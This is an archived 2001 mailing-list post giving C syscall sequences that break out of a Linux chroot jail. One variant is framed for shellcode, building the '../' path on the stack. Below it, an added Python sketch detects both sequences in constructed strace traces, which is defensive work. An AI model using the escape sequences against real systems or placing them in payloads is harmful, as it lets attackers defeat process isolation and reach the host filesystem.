> /* To break chroot we have to...
>
> fd = open ( ".", O_RDONLY );
> mkdir ( "hax0r", 0666 );
> chroot ( "hax0r" );
> fchdir ( fd );
> for ( i = 0; i < 254; i++ )
>     chdir ( ".." );
> chroot ( "." );
>
> */

Too complex for standard linux
All we have to do to break chroot is:

mkdir("/sh"); // we already have string "/sh" in memory as a part of
              // "/bin/sh"
chroot("/sh");
chroot("../../../../../../../../../"); // a number of "../" here,
                                       // I used 0x10

Last string can be built on the stack with a simple loop

Tested on linux 2.2.1

-am
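Both sequences in the message above depend on a process that is already inside a chroot making further successful chroot() calls, which leaves a recognisable pattern in a syscall trace. The following detection sketch is an added example, not part of the original post; it assumes `strace -f` style lines with a leading pid, and the trace, pids and the `/var/jail` path are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed strace -f style lines (not from the original post).
# pid 812: jails itself, drops root, later chroot() fails with EPERM.
# pid 901: the mkdir/chroot/chroot("../..") sequence from the reply.
# pid 950: the open/chroot/fchdir/chroot sequence from the quoted text.
SAMPLE_TRACE = """\
812 chroot("/var/jail") = 0
812 chdir("/") = 0
812 setuid(65534) = 0
812 chroot("/sh") = -1 EPERM (Operation not permitted)
901 chroot("/var/jail") = 0
901 chdir("/") = 0
901 mkdir("/sh", 0777) = 0
901 chroot("/sh") = 0
901 chroot("../../../../../../../../../") = 0
950 open(".", O_RDONLY) = 3
950 chroot("hax0r") = 0
950 fchdir(3) = 0
950 chroot(".") = 0
"""

# pid, syscall name, quoted path (or numeric fd), return value
CALL = re.compile(
    r'^(\d+)\s+(chroot|fchdir)\((?:"([^"]*)"|\d+)[^)]*\)\s+=\s+(-?\d+)')

def find_chroot_escapes(trace):
    """Return {pid: sorted reasons} for processes showing either sequence."""
    chroots = defaultdict(int)    # successful chroot() calls seen per pid
    findings = defaultdict(set)
    for line in trace.splitlines():
        m = CALL.match(line)
        if not m or int(m.group(4)) != 0:
            continue              # other syscalls and failed calls are ignored
        pid, name, path = int(m.group(1)), m.group(2), m.group(3)
        if name == "fchdir":
            if chroots[pid]:      # directory fd used after the root changed
                findings[pid].add("fchdir after chroot")
            continue
        chroots[pid] += 1
        if chroots[pid] > 1:
            findings[pid].add("repeated chroot")
        if ".." in path.split("/"):
            findings[pid].add("chroot path with ..")
    return {pid: sorted(reasons) for pid, reasons in findings.items()}
```

Pid 812 in the sample is not flagged: once the process has given up root, the later chroot() returns EPERM and the detector ignores failed calls.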
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:40:09 PDT